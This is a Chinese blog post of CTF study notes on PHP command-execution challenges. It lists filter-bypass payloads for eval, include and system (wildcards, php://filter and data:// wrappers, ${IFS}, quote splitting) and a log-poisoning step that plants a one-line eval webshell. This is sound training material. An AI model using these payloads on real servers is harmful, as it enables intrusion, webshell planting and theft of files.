CTF Web入门 命令执行 笔记

最新推荐文章于 2024-08-21 13:58:28 发布
最新推荐文章于 2024-08-21 13:58:28 发布
阅读量1k 收藏 7
点赞数 7
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57162109/article/details/127480502
版权

CTF Web入门

命令执行

eval(读取命令),但各种字符被ban

if(!pregmatch("...",$c)) #指过滤了...
	eval($c);

这时候可以尝试

?c=system("ls"); 
?c=system("cp flag.php 1.txt"); 
1.txt

若屏蔽了flag/php/“”/system

?c=`cp fla?.??? 1.txt`; #反引号类似于system作用,

若屏蔽了.

?c=eval($_GET[1]);/?> &1=system("tac flag.php");

使用跳板1逃逸了对于c的正则判断

若屏蔽了()

或者可以使用include、require用文件包含解决

?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php #%0a是换行符

include($),但flag/php被ban

if(!pregmatch("/flag/i",$c)){
  include($c);
  echo $flag;
}

使用data伪协议

?c=data://text/plain,<?php system("mv fla*.php 1.txt")?>

为什么不能用

php://filter/convert.base64-encode/resource=flag.php

因为题目过滤了flag

若过滤了php

这时候就要使用短标签绕过

?c=data://text/plain,<?=system("cp fla*.*** 1.txt")?>

system(“shell命令”),但各种字符被ban

if(!pregmatch("...",$c))
	system($c."	>dev/null 2>&1");#后面这串奇怪的东西是让你执行的结果不显示

这里可以使用双写绕过

?c=tac%20/%09flag.php&&/;/||ls

如果空格/tab/flag/&全部被过滤了,就要使用一种不用空格的读取命令

?c=nl<fla''g.php||ls

这里因为不支持通配,故利用shell特性’‘分隔字符串,执行时’‘会自动忽略

如果<也被ban了怎么办?

如果有$ 的话可以使用${IFS},它代表空格/tab/换行

?c=mv${IFS}fla?.php${IFS}a.txt%7C%7Cls

eval(读取命令),但有些读取命令被ban

$c=$_POST['c'];
eval($c);

尝试各种系统读取文件的方法

#POST:
c=system();	echo shell_exec();	file_get_contents("*.php");
highlight_file();	show_source();
c=echo include($_GET[1]); 
#这时候在GET添加?1=php://filter/convert.base64-encode/resource=flag.php	
#也可以用日志注入?1=/var/log/nginx/access.log 在User-Agent添加一句话木马<?php eval($_POST[a]);?>
#如果你确定变量名为flag的话
c=include("flag.php");echo $flag;
c=include("flag.php");var_dump(get_defined_vars());
#再或者
c=$curl = curl_init();
//设置url
curl_setopt($curl, CURLOPT_URL, 'file:///var/www/html/flag.php');
// 不返回HTTP头部信息
curl_setopt($curl, CURLOPT_HEADER, false);
// 设置获取的信息以文件流的形式返回
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
// 执行命令
$data = curl_exec($curl);
//防止返回结果数据中文乱码
$data =mb_convert_encoding($data , 'UTF-8', 'UTF-8,GBK,GB2312,BIG5');
// 关闭URL请求
curl_close($curl);
// 显示获得的数据
print_r($data);

这里补充几种扫描目录并打印的方法

c=var_dump(scandir('.'));//扫描当前目录
c=var_dump(scandir('../'));//扫描上一级目录
c=var_dump(scandir('/'));//扫描根目录
c=print_r(scandir('/'));
#如果没有读权限了,试试GLOBAL协议
c=$a="glob:///*.txt"; //glob:// /*.txt
	if($b=opendir($a)){
    while(($file=readdir($b))!==false){
      echo "filename:".$file."\n";
    }
    closedir($b);
  }

来自ctfshow群主大菜鸡录制的web入门命令执行系列视频
视频移步CTFshow的个人空间_哔哩哔哩_bilibili

stopAtEntry
关注
[网络安全自学篇] 一.入门笔记之看雪Web安全学习及异或解密示例
杨秀璋的专栏
07-31 10万+
最近开始学习网络安全相关知识,接触了好多新术语,感觉自己要学习的东西太多,真是学无止境,也发现了好几个默默无闻写着博客、做着开源的大神。准备好好学习下新知识,并分享些博客与博友们一起进步,加油。非常基础的文章,大神请飘过,谢谢各位看官!
ctf-web--总结几点基础题的做题思路
Sanky0u的博客
08-14 2万+
做了三天web题了,因为刚入门,还是不要做得太快,先把前几天学到的好好总结一下,一部分是做的几道bugku上的web题,一部分是合天网安上面做的几道web题,这篇博客就先介绍第一部分。 1. 看源码可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2.
CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
热门推荐
Sp4rkW的博客
08-21 4万+
原题内容: 地址:http://120.24.86.145:8003/ 怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 1083
任务环境说明:服务器场景:Server1。
CTF-命令执行【超详细】
最新发布
Innocence_0的博客
08-21 812
作者简介:不知名白帽,网络安全学习者。
CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2648
[ACTF2020 新生赛]Exec 抓包看看 得到信息:以post方式通过变量target传参
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 963
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTF之代码/命令执行
m0_62102520的博客
07-13 349
1.命令执行介绍 2.命令执行原理 3.代码执行介绍
CTFWEB 代码执行&命令执行&CTFSHOW wp
m0_48736242的博客
10-02 2180
CTFWEB 代码执行&命令执行&CTFSHOW wp
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 881
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
docker学习笔记5【实战 将ctfweb题环境docker打包供他人使用】
qq_43679507的博客
01-13 999
docker学习笔记5【实战 将ctfweb题环境docker打包供他人使用】
CTF-命令执行
Luodehahajiang的博客
07-03 2130
ctf 命令执行 命令执行函数 命令执行绕过方法
16.CTF-web安全-命令执行
woo233的博客
09-29 1003
当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 637
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
linux docker位置查找,linux – 如何在Docker中获取依赖子图像列表?(1)
2301_77118221的博客
04-26 433
本书是获得了很多读者好评的Linux经典畅销书**《Linux从入门到精通》的第2版**。您应该能够查找父ID以f50f9524513f开头的图像,然后查找这些图像的子图像等.但是.Parent isn’t what you think.,所以在大多数情况下,您需要指定docker图像 – 以上所有才能使其工作,那么你也将获得所有中间层的图像ID.需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。
CTF命令执行篇 与 实际的命令执行漏洞
2301_81556781的博客
07-08 808
7.preg_replace eg:preg_replace(pattern,replacement,subject,limit,count) [其中pattern,replacement,subject 是必填][一般只写command]𝑎𝑟𝑔𝑠:这是一个可变参数列表,用于传递给‘args:这是一个可变参数列表,用于传递给‘callback。:这是一个必须的参数,用于指定要匹配的模式,通常是一个正则表达式。' '|' '-' '(' ')' '反引号' '||' '&&' '&' '}' '{'
CTFshow Web入门 命令执行
m0_62905261的博客
05-01 1425
CTFshow Web入门 命令执行
[ctf web]system函数详解[php命令执行函数][web渗透]
Lhy1963245411的博客
07-18 307
return_var:可选参数,整数类型,如果提供此参数,则command命令执行之后的返回状态会被放置到return_var函数内。返回0表示执行成功,返回1表示执行失败。command:必选参数,字符类型,被system函数执行命令,如ls。system函数简介:用于执行命令。system函数默认有回显。
webCTF文件包含
04-24
WebCTF文件包含是一种常见的Web安全漏洞,也被称为文件包含漏洞。它指的是在Web应用程序中,未正确过滤用户输入导致恶意用户可以通过构造特定的请求,将本应该被限制访问的文件包含到页面中。 文件包含漏洞通常存在于动态网页中,其中包含了用户可控的参数,如URL参数、表单提交等。攻击者可以通过修改这些参数,使得应用程序将恶意文件包含到页面中,从而执行任意的代码。 攻击者利用文件包含漏洞可以实现以下攻击: 1. 读取敏感文件:攻击者可以读取服务器上的敏感文件,如配置文件、数据库凭证等。 2. 执行任意代码:攻击者可以通过包含恶意代码文件,执行任意的系统命令或者脚本。 3. 远程文件包含:攻击者可以通过包含远程服务器上的文件,实现远程代码执行。 为了防止文件包含漏洞,开发人员应该采取以下措施: 1. 输入验证和过滤:对用户输入进行严格的验证和过滤,确保只允许合法的输入。 2. 文件路径限制:限制用户输入的文件路径只能访问指定目录下的文件,避免访问敏感文件。 3. 使用白名单:限制可包含的文件列表,只允许包含指定的文件,避免包含任意文件。 4. 避免直接包含用户输入:尽量避免直接将用户输入作为文件路径进行包含,可以使用间接方式,如通过参数传递。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值